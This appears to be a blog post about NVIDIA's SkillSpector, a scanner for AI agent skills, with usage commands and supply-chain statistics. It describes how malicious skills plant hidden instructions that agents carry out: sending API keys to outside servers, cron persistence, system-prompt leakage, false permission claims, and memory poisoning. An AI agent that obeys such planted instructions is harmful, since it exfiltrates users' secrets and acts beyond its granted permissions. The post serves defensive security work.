Every 4th AI Skill You Install May Be Toxic
42,447 AI Agent skill samples, 26.1% with vulnerabilities, 5.2% suspected malicious.
This is not an alarmist clickbait title; it's the conclusion of an empirical study published by Liu et al. in 2026. Put plainly: for every 4 skills you install, 1 is exposed; for every 20 skills, 1 is stealing from you.
This week, NVIDIA open-sourced SkillSpector, which shot to GitHub Trending with 9,933 stars and 784 forks. It does one simple thing: scan before you install a skill.
Why skills are more dangerous than plugins
When a browser extension goes bad, it may crash one page. When an npm package goes bad, at least there are lock files, audit tools, and CI pipelines to catch it.
But Agent skills are different.
They are not ordinary code. They are behavioral manifests — directly telling the Agent: "you can work like this, call these tools, read these files, execute these scripts." If the manifest hides malicious instructions, the Agent won't treat them as an attack; it will execute them as task rules.
That's the insidious nature of skills: they exploit trust vulnerabilities, not code vulnerabilities.
You install a "PDF generation" skill. It can indeed generate PDFs. But it might also be doing:
- Iterating
os.environand sending your API keys to an external server - Adding a cron persistence task in the install script
- Leaking system prompts through prompt injection
- Declaring read-only permissions while actually writing files
You won't notice. Because when the Agent executes these actions, it doesn't ask "do you allow?" — it treats them as normal behavior defined by the skill.
How SkillSpector scans
Not keyword matching, but a two-stage pipeline.
Stage 1: Static analysis. Regex rules + Python AST behavior analysis + dangerous call detection + YARA signature matching. No code execution; purely file content inspection.
Stage 2: Optional LLM semantic evaluation. Let the model judge more subtle risks — for instance, seemingly normal instructions that actually induce the Agent to perform unauthorized operations.
Covers 65 vulnerability patterns across 16 categories:
| Category | Typical Risk |
|---|---|
| Prompt Injection | Hidden instructions, instruction overwriting |
| Data Exfiltration | Environment variable harvesting, external communication |
| Privilege Escalation | Excessive autonomous behavior, undeclared capabilities |
| Supply Chain Risk | Malicious dependencies, CVE packages |
| MCP Tool Poisoning | Permission claims don't match actual behavior |
| Memory Poisoning | Contaminating Agent long-term memory |
| System Prompt Leakage | Inducing Agent to output internal instructions |
After scanning, it gives a risk score from 0-100, mapped to LOW/MEDIUM/HIGH/CRITICAL, and a recommendation: SAFE, CAUTION, DO_NOT_INSTALL.
Practical: 5 minutes to get started
Install with uv, no need to clone the repo:
uv tool install git+https://github.com/NVIDIA/SkillSpector.git
Scan a local skill directory:
skillspector scan ./my-skill/
Scan a single SKILL.md:
skillspector scan ./SKILL.md
Generate JSON report (for automation):
skillspector scan ./my-skill/ --format json --output report.json
Generate SARIF (for CI/CD or IDE):
skillspector scan ./my-skill/ --format sarif --output report.sarif
Don't want to send file contents to an LLM? Run only static analysis:
skillspector scan ./my-skill/ --no-llm
The --no-llm option isn't an optional extra. The README explicitly warns: LLM semantic analysis sends file contents to the provider you configure. If you're scanning internal company skills, the content may contain trade secrets — in that case, --no-llm is not a choice, it's a necessity.
What makes it better than manual review
Manual review of skills: the problem isn't that you can't understand it, it's that you can't see it all.
A skill may simultaneously contain Markdown instructions (hiding prompt injection), Python scripts (calling exec/subprocess), dependency declarations (referencing packages with CVEs), MCP configurations (declaring excessive permissions), and output processing logic (inducing exfiltration). Relying on human inspection easily misses the connections between contexts.
SkillSpector breaks these risks into rules and scores, covers all 65 patterns, delivers results in seconds, and can be integrated into CI as a gate.
But more critically, it acknowledges its own boundaries.
The README states clearly: SkillSpector does not execute the scanned skill; all analysis is static. It flags risks before you install, not isolate risks after installation.
This is more honest than tools that imply "use it and be safe."
Why NVIDIA built this
NVIDIA is not just open-sourcing a tool. It's building a skill governance system.
According to the NVIDIA Technical Blog, before a skill enters the NVIDIA Skills directory, it must first pass a SkillSpector scan. This turns security checks into a mandatory step in the release process — not a "we recommend you scan," but a "no scan, no publish."
At the same time, NVIDIA also introduced Verified Agent Skills and Skill Cards, adding certification labels to skills that pass audit. The intention of this combination is clear: define the security standards for Agent skills, and then become the standard-setter.
This mirrors the same logic as Docker Hub's image scanning, npm's audit, and PyPI's security checks — whoever controls the security gate controls the ecosystem's voice.
The Agent skill ecosystem has exploded from fewer than 50 new skills per day in early 2026 to over 500 per day. ClawHub, a major registry, lacks systematic review. Snyk's audit of 3,984 skills found 1,467 malicious payloads.
The market is growing wildly; NVIDIA is building the toll booth.
Who should use it
Individual developers: If you use Claude Code, Codex CLI, Gemini CLI and often install third-party skills — add skillspector scan to your installation routine. It takes 5 seconds.
Teams: Maintain an internal skill library? Run --format markdown to generate an audit report, which is more reliable than saying "I've looked at the code."
Platforms: Running a skill marketplace or registry? Plug the SARIF output into your CI, and use the recommendation as a gate — SAFE to allow, CAUTION for manual review, DO_NOT_INSTALL to block directly.
One more issue
SkillSpector scans the skill itself. But Agent security risks come from more than just skills.
MCP server permission boundaries, runtime sandbox isolation for Agents, interaction risks when multiple skills are combined — none of these can be solved by a pre-install scanner alone.
The 26.1% vulnerability rate shows that the skill ecosystem indeed needs security checks. But the security check is only the first door, not the whole building.
A complete picture of Agent security probably needs three layers: pre-install scanning (what SkillSpector does), runtime sandbox (limiting what the Agent can actually do), and post-action auditing (recording what the Agent did).
Right now, only the first layer exists. The latter two are still blank.
NVIDIA has started something. But the road is long.
GitHub: https://github.com/NVIDIA/SkillSpector
Data sources: Liu et al. 2026 empirical study (42,447 samples); GitHub API (9,933 Stars / 784 Forks, 2026-06-24); NVIDIA Technical Blog
暂无评论。